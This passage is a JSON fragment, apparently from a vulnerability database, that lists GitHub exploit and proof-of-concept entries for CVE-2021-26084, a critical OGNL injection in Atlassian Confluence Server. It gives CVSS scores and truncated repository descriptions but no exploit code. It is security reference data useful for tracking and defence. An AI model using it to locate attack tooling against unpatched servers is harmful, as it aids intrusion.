{"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-01-13T06:29:51", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-19T15:09:22", "id": "C0A9F032-9822-59DC-94CC-20C15DEE0FED", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T18:51:38", "description": "# ConfluCHECK\nPython 3 script to identify CVE-2021-26084 via net...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-11-23T19:45:31", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-24T19:02:52", "id": "6BB53677-CE73-5D62-9443-E0D71E27C1C8", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:51", "description": "# CVE-2021-26084-Confluence-OGNL\nasjhdsajdlksavksapfokaajsdlksaj...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-06T06:55:15", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-06T06:58:34", "id": "C58D4A9D-FE17-5F41-8B1B-800E327BB411", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-31T12:14:59", "description": "# CVE-2021-26084 - Confluence Server Webwork OGNL injection\n\n- A...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T07:15:17", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-31T09:15:01", "id": "1E5E573E-3F0A-5243-BE87-314E2BDC4107", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:01", "description": "# CVE-2021-26084\nCVE-2021-26084 Confluence OGNL injection\n\n![\u56fe\u7247]...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, 
"impactScore": 5.9}, "published": "2021-09-03T07:41:36", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-27T09:00:16", "id": "B16D26DB-D60C-5C0C-9452-80112720B442", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:45:54", "description": "# CVE-2021-26084\nThis i...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-02T07:05:23", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, 
"acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-02T07:07:25", "id": "DC2A0BD8-2ABF-5885-957D-0FA3B058665C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-07-13T23:25:08", "description": "# CVE-2021-26084\nCVE-2021-26084 - Confluence Pre-Auth RCE | O...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-31T16:33:32", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-07-13T21:41:32", "id": "28091F24-DF21-50D7-8BBB-F4C77F5B07C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:47:15", "description": "# CVE-2021-2608...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", 
"privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T12:36:52", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-04T03:09:22", "id": "00AD1BE3-F5D6-5689-83B0-51AD7D8AFE8D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-01-13T09:42:12", "description": "# CVE-2021-26084 (PoC) | Confluence Server Webwork OGNL injectio...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-31T23:33:44", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 
"integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-01-13T08:40:52", "id": "45606E7F-5EF6-5B64-B81C-F4C556A8DE08", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:49:37", "description": "# CVE-2021-26084_PoC...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-18T07:33:24", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-12-01T09:03:37", "id": "2BE90BD5-68B3-521E-B2DF-923D04CC1189", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\nConfluence OGNL injection\n\nCVE-2021-26084 is an...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": 
"CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-09T06:19:13", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-03-31T23:43:54", "id": "A9A21055-01FA-5B3E-84B3-E294A9641418", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:51:44", "description": "# CVE-2021-26084 patch \n\n CVE-2021-26084 patch provided by \"Co...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-08T17:05:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": 
false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-08T17:29:07", "id": "84D5F04A-0DDB-5788-8759-DA99D303B756", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:53:20", "description": "# CVE-2021-26084\nProof of concept for CVE-2021-26084. \n\nConfluen...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-01T15:19:19", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-05-25T14:48:53", "id": "BFA4DC64-759A-5113-842C-923C98D12B44", "href": "", "cvss": {"score": 7.5, "vector": 
"AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-23T04:27:16", "description": "# CVE-2021-26084\nAtlassian Confluence CVE-2021-26084 one-liner ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-07T01:15:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-02-22T21:21:20", "id": "A4DD8B03-CBED-5284-83EA-6C21FE0EA21C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:06", "description": "This is a quick and dirty poc, tuned for a specifc confluence in...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, 
"published": "2021-09-07T12:04:09", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-11T18:14:44", "id": "63E9680A-4D3C-5C4C-9EB3-63F2DB64F66D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:34:58", "description": "# confluence-rce-poc\nSetting up ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-04T14:53:38", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, 
"obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-09-04T15:16:43", "id": "07C144EB-D3A5-58B3-8077-F40B0DD3A8C9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:47", "description": "# CVE-2021-26084\n<p align=\"center\">\n <img src=\"https://user-ima...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-04T13:32:42", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-04-23T04:56:52", "id": "2C7E80B0-6BD9-590B-A1D6-F10D66CD7379", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-10T20:52:43", "description": "# CVE-2021-26084\n\n- An OGNL injection vulnerability exists that ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", 
"integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-09-05T09:27:55", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-11-16T03:56:14", "id": "4A995433-D0C6-5BF7-9A78-962229397A7D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:36:37", "description": "# Confluence Server Webwork Pre-Auth OGNL Injection (CVE-2021-26...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-10-02T03:11:50", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-02T03:16:43", "id": "CE477D7E-7586-5C82-8DCC-033C48461E66", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2021-12-10T15:38:38", "description": "# CVE-2021-26084\nConfluence aut...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-09-08T11:01:49", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2021-10-22T04:53:46", "id": "EF37F62F-1579-535A-9C3E-49B080F41CAC", "href": "", 